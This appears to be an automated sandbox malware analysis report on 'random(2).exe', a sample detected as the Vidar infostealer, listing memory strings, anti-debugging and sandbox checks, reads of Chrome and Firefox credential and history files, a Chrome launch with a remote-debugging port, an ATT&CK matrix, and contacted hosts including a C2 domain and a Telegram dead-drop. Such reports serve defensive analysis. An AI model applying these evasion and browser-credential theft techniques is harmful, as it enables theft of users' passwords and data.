Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor9
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
              Source: chrome.exe, 0000000C.00000003.2430674176.00000249D9C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Sched
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6769000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D6769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V hjyxccxlsbpgevf Bus
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V hjyxccxlsbpgevf Bus Pipes
              Source: chrome.exe, 0000000C.00000003.2389764630.00003CCC00314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor]
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D669B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition|xG.
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesJ
              Source: chrome.exe, 0000000C.00000003.2430624506.00000249D9C13000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434128229.00000249D9C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitions
              Source: chrome.exe, 0000000C.00000002.2540680415.00000249D29DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.sys
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 0000000C.00000003.2433658544.00000249D9C10000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434128229.00000249D9C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processormui
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor[|f.
              Source: chrome.exe, 0000000C.00000003.2433036035.00000249D9BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Inte
              Source: chrome.exe, 0000000C.00000003.2433658544.00000249D9BE2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2436019975.00000249D9C03000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433658544.00000249D9C05000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2436263825.00000249D9BF2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2435809667.00000249D9BE9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2436019975.00000249D9BF9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9BB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
              Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434425374.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2430756068.00000249D6721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceI
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor?}
              Source: chrome.exe, 0000000C.00000003.2434955646.00000249D9BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Con
              Source: chrome.exe, 0000000C.00000002.2649650384.00000249D9B38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B4E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B4E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2431385780.00000249D9B4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition
              Source: C:\Users\user\Desktop\random(2).exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\random(2).exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(2).exeFile opened: NTICE
              Source: C:\Users\user\Desktop\random(2).exeFile opened: SICE
              Source: C:\Users\user\Desktop\random(2).exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\random(2).exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: Yara matchFile source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              1
              Process Injection
              1
              Masquerading
              1
              OS Credential Dumping
              631
              Security Software Discovery
              Remote Services1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              24
              Virtualization/Sandbox Evasion
              LSASS Memory24
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Extra Window Memory Injection
              1
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Software Packing
              LSA Secrets223
              System Information Discovery
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Extra Window Memory Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1643067 Sample: random(2).exe Startdate: 19/03/2025 Architecture: WINDOWS Score: 100 23 y.p.formaxprime.co.uk 2->23 25 t.me 2->25 35 Suricata IDS alerts for network traffic 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 3 other signatures 2->41 8 random(2).exe 18 2->8         started        signatures3 process4 dnsIp5 29 y.p.formaxprime.co.uk 78.47.63.132, 443, 49682, 49683 HETZNER-ASDE Germany 8->29 31 t.me 149.154.167.99, 443, 49681 TELEGRAMRU United Kingdom 8->31 33 127.0.0.1 unknown unknown 8->33 43 Attempt to bypass Chrome Application-Bound Encryption 8->43 45 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->45 47 Tries to harvest and steal browser information (history, passwords, etc) 8->47 49 5 other signatures 8->49 12 chrome.exe 8->12         started        14 chrome.exe 8->14         started        16 chrome.exe 8->16         started        18 4 other processes 8->18 signatures6 process7 process8 20 chrome.exe 12->20         started        dnsIp9 27 www.google.com 142.250.186.164, 443, 49710, 49711 GOOGLEUS United States 20->27

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              random(2).exe50%VirustotalBrowse
              random(2).exe59%ReversingLabsWin32.Trojan.Vidar
              random(2).exe100%AviraTR/Crypt.TPM.Gen
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://ssl.google.cmanager.com0%Avira URL Cloudsafe
              https://www.google.comAccess-Control-Allow-Credentials:0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              y.p.formaxprime.co.uk
              78.47.63.132
              truetrue
                unknown
                t.me
                149.154.167.99
                truefalse
                  high
                  www.google.com
                  142.250.186.164
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://t.me/g_etcontentfalse
                      high
                      https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                        high
                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                          high
                          https://www.google.com/async/newtab_promosfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://google.com/chrome.exe, 0000000C.00000002.5817119523.00003CCC000A5000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://t.me/g_etcontentdqu220Mozilla/5.0random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://goto.google.com/sme-bugs2echrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://web.telegram.orgrandom(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prwt26ph.0.drfalse
                                        high
                                        https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000C.00000003.2415004575.00003CCC01544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
